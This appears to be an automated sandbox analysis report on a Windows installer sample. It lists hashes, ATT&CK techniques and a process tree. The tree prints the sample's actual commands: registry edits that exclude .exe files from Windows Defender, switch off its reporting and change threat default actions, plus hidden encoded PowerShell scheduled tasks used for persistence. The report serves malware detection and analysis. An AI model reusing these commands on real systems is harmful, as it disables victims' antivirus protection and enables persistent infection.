dce6cdd2c122b887725c2a60ec7761a93c1ead60ba78d49aff5677161fad4c63

General

Target

file.exe
Size

7.3MB
MD5

1d403a08252cb0cea368c5a2383efbf1
SHA1

ace16e30c1f12c22ec655caf04b62abda3f2049e
SHA256

dce6cdd2c122b887725c2a60ec7761a93c1ead60ba78d49aff5677161fad4c63
SHA512

0c7706a396914174524301a0821aed281ad1b742ea1e3a9c2757558188d6732b09f3f8e510807f5ec369639118f0f2a85f6c5650067bb78c5cc488d6d5ce4eab
SSDEEP

196608:91OUh4w9xODsuDG6jl1ac/jkkeFXgQV/BQekON18vntX:3OcxO9DHF0X5QexantX

Score

8^/10

Malware Config

Signatures

Executes dropped EXE 3 IoCs

Processes:

Install.exeInstall.exezYysAoL.exe

pid process

4184 Install.exe
4488 Install.exe
3068 zYysAoL.exe
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Install.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Install.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation Install.exe
Drops file in System32 directory 1 IoCs

Processes:

Install.exe

description ioc process

File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe
Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\bPisEBnRwoxYOmuHrm.job schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

4204 schtasks.exe
3736 schtasks.exe

pid	process
4184	Install.exe
4488	Install.exe
3068	zYysAoL.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	Install.exe

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

description	ioc	process
File created	C:\Windows\Tasks\bPisEBnRwoxYOmuHrm.job	schtasks.exe

pid	process
4204	schtasks.exe
3736	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.EXE

pid process

4472 powershell.EXE
4472 powershell.EXE
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.EXE

description pid process

Token: SeDebugPrivilege 4472 powershell.EXE

pid	process
4472	powershell.EXE
4472	powershell.EXE

description	pid	process
Token: SeDebugPrivilege	4472	powershell.EXE

Suspicious use of WriteProcessMemory 47 IoCs

Processes:

file.exeInstall.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exepowershell.EXEzYysAoL.exe

description	pid	process	target process
PID 3644 wrote to memory of 4184	3644	file.exe	Install.exe
PID 3644 wrote to memory of 4184	3644	file.exe	Install.exe
PID 3644 wrote to memory of 4184	3644	file.exe	Install.exe
PID 4184 wrote to memory of 4488	4184	Install.exe	Install.exe
PID 4184 wrote to memory of 4488	4184	Install.exe	Install.exe
PID 4184 wrote to memory of 4488	4184	Install.exe	Install.exe
PID 4488 wrote to memory of 3816	4488	Install.exe	forfiles.exe
PID 4488 wrote to memory of 3816	4488	Install.exe	forfiles.exe
PID 4488 wrote to memory of 3816	4488	Install.exe	forfiles.exe
PID 4488 wrote to memory of 5016	4488	Install.exe	forfiles.exe
PID 4488 wrote to memory of 5016	4488	Install.exe	forfiles.exe
PID 4488 wrote to memory of 5016	4488	Install.exe	forfiles.exe
PID 3816 wrote to memory of 4788	3816	forfiles.exe	cmd.exe
PID 3816 wrote to memory of 4788	3816	forfiles.exe	cmd.exe
PID 3816 wrote to memory of 4788	3816	forfiles.exe	cmd.exe
PID 5016 wrote to memory of 1120	5016	forfiles.exe	cmd.exe
PID 5016 wrote to memory of 1120	5016	forfiles.exe	cmd.exe
PID 5016 wrote to memory of 1120	5016	forfiles.exe	cmd.exe
PID 4788 wrote to memory of 1364	4788	cmd.exe	reg.exe
PID 4788 wrote to memory of 1364	4788	cmd.exe	reg.exe
PID 4788 wrote to memory of 1364	4788	cmd.exe	reg.exe
PID 1120 wrote to memory of 4544	1120	cmd.exe	reg.exe
PID 1120 wrote to memory of 4544	1120	cmd.exe	reg.exe
PID 1120 wrote to memory of 4544	1120	cmd.exe	reg.exe
PID 4788 wrote to memory of 3232	4788	cmd.exe	reg.exe
PID 4788 wrote to memory of 3232	4788	cmd.exe	reg.exe
PID 4788 wrote to memory of 3232	4788	cmd.exe	reg.exe
PID 1120 wrote to memory of 368	1120	cmd.exe	reg.exe
PID 1120 wrote to memory of 368	1120	cmd.exe	reg.exe
PID 1120 wrote to memory of 368	1120	cmd.exe	reg.exe
PID 4488 wrote to memory of 4204	4488	Install.exe	schtasks.exe
PID 4488 wrote to memory of 4204	4488	Install.exe	schtasks.exe
PID 4488 wrote to memory of 4204	4488	Install.exe	schtasks.exe
PID 4488 wrote to memory of 3380	4488	Install.exe	schtasks.exe
PID 4488 wrote to memory of 3380	4488	Install.exe	schtasks.exe
PID 4488 wrote to memory of 3380	4488	Install.exe	schtasks.exe
PID 4472 wrote to memory of 3496	4472	powershell.EXE	gpupdate.exe
PID 4472 wrote to memory of 3496	4472	powershell.EXE	gpupdate.exe
PID 4488 wrote to memory of 1100	4488	Install.exe	schtasks.exe
PID 4488 wrote to memory of 1100	4488	Install.exe	schtasks.exe
PID 4488 wrote to memory of 1100	4488	Install.exe	schtasks.exe
PID 4488 wrote to memory of 3736	4488	Install.exe	schtasks.exe
PID 4488 wrote to memory of 3736	4488	Install.exe	schtasks.exe
PID 4488 wrote to memory of 3736	4488	Install.exe	schtasks.exe
PID 3068 wrote to memory of 2648	3068	zYysAoL.exe	powershell.exe
PID 3068 wrote to memory of 2648	3068	zYysAoL.exe	powershell.exe
PID 3068 wrote to memory of 2648	3068	zYysAoL.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3644

C:\Users\Admin\AppData\Local\Temp\7zS280A.tmp\Install.exe
.\Install.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4184

C:\Users\Admin\AppData\Local\Temp\7zS2DF5.tmp\Install.exe
.\Install.exe /S /site_id "525403"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:4488

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:3816

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:4788

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
6⤵
PID:1364

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
6⤵
PID:3232

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:5016

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:1120

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
6⤵
PID:4544

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
6⤵
PID:368

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ghRtTcpcL" /SC once /ST 07:43:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
4⤵
- Creates scheduled task(s)
PID:4204

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "ghRtTcpcL"
4⤵
PID:3380

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ghRtTcpcL"
4⤵
PID:1100

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bPisEBnRwoxYOmuHrm" /SC once /ST 14:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\zYysAoL.exe\" mF /site_id 525403 /S" /V1 /F
4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4472

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:3496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:3204

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:3428

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:3484

C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\zYysAoL.exe
C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\zYysAoL.exe mF /site_id 525403 /S
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3068

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
2⤵
PID:2648

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

4

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7zS280A.tmp\Install.exe

Filesize
6.3MB

MD5
081a27acfe7cf0b18d2fb3e1edf1a8c7

SHA1
a0dfcadecc9b4aa7841e1a2148c4d76e6f59fb48

SHA256
f8bda0a287b1154bfd6ffb0465c6cf633af175b550453996d40f448739c2b029

SHA512
321bdee078bd4d7db098aa57a2a19d802c12a9b35b9dd9801ca9bb924dbf48c948acc949da768ff7fd11624c1434b306b8301f143be4d79626c6c433c789b5c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS280A.tmp\Install.exe

Filesize
6.3MB

MD5
081a27acfe7cf0b18d2fb3e1edf1a8c7

SHA1
a0dfcadecc9b4aa7841e1a2148c4d76e6f59fb48

SHA256
f8bda0a287b1154bfd6ffb0465c6cf633af175b550453996d40f448739c2b029

SHA512
321bdee078bd4d7db098aa57a2a19d802c12a9b35b9dd9801ca9bb924dbf48c948acc949da768ff7fd11624c1434b306b8301f143be4d79626c6c433c789b5c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS2DF5.tmp\Install.exe

Filesize
6.8MB

MD5
a37dbf6bceec57a1792cefc8691b4930

SHA1
97a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063

SHA256
edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa

SHA512
b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS2DF5.tmp\Install.exe

Filesize
6.8MB

MD5
a37dbf6bceec57a1792cefc8691b4930

SHA1
97a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063

SHA256
edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa

SHA512
b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77

Download Submit
C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\zYysAoL.exe

Filesize
6.8MB

MD5
a37dbf6bceec57a1792cefc8691b4930

SHA1
97a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063

SHA256
edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa

SHA512
b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77

Download Submit
C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\zYysAoL.exe

Filesize
6.8MB

MD5
a37dbf6bceec57a1792cefc8691b4930

SHA1
97a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063

SHA256
edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa

SHA512
b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77

Download Submit
memory/368-148-0x0000000000000000-mapping.dmp

Download
memory/1100-155-0x0000000000000000-mapping.dmp

Download
memory/1120-144-0x0000000000000000-mapping.dmp

Download
memory/1364-145-0x0000000000000000-mapping.dmp

Download
memory/2648-162-0x0000000000000000-mapping.dmp

Download
memory/3068-159-0x0000000010000000-0x0000000010D2B000-memory.dmp

Filesize
13.2MB

Download
memory/3232-147-0x0000000000000000-mapping.dmp

Download
memory/3380-150-0x0000000000000000-mapping.dmp

Download
memory/3496-153-0x0000000000000000-mapping.dmp

Download
memory/3736-156-0x0000000000000000-mapping.dmp

Download
memory/3816-141-0x0000000000000000-mapping.dmp

Download
memory/4184-132-0x0000000000000000-mapping.dmp

Download
memory/4204-149-0x0000000000000000-mapping.dmp

Download
memory/4472-152-0x00007FF852730000-0x00007FF8531F1000-memory.dmp

Filesize
10.8MB

Download
memory/4472-154-0x00007FF852730000-0x00007FF8531F1000-memory.dmp

Filesize
10.8MB

Download
memory/4472-151-0x000002635ABD0000-0x000002635ABF2000-memory.dmp

Filesize
136KB

Download
memory/4488-138-0x0000000010000000-0x0000000010D2B000-memory.dmp

Filesize
13.2MB

Download
memory/4488-135-0x0000000000000000-mapping.dmp

Download
memory/4544-146-0x0000000000000000-mapping.dmp

Download
memory/4788-143-0x0000000000000000-mapping.dmp

Download
memory/5016-142-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads